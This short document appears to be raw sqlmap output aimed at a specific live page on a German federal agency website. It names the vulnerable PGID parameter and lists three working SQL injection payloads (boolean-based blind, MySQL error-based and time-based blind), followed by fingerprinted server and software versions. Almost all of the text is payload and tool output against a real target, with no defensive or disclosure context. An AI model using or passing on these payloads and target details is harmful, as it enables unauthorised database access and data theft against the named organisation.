https://www.bundessortenamt.de/rhodo/index.cfm?b=E&SORT=1&STEP=5&PGID=0&job=rhodo_chrono
Parameter: PGID (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: b=E&SORT=1&STEP=5&PGID=-3609 OR (1610=1610)&job=rhodo_chrono Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: b=E&SORT=1&STEP=5&PGID=0 AND (SELECT 8016 FROM(SELECT COUNT(*),CONCAT(0x71787a7171,(SELECT (CASE WHEN (8016=8016) THEN 1 ELSE 0 END)),0x7162717871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&job=rhodo_chrono Type: AND/OR time-based blind Title: MySQL > 5.0.11 OR time-based blind Payload: b=E&SORT=1&STEP=5&PGID=-2631 OR 8559=SLEEP(5)&job=rhodo_chrono --- web server operating system: Windows 2008 R2 or 7 web application technology: ASP.NET, ColdFusion, Microsoft IIS 7.5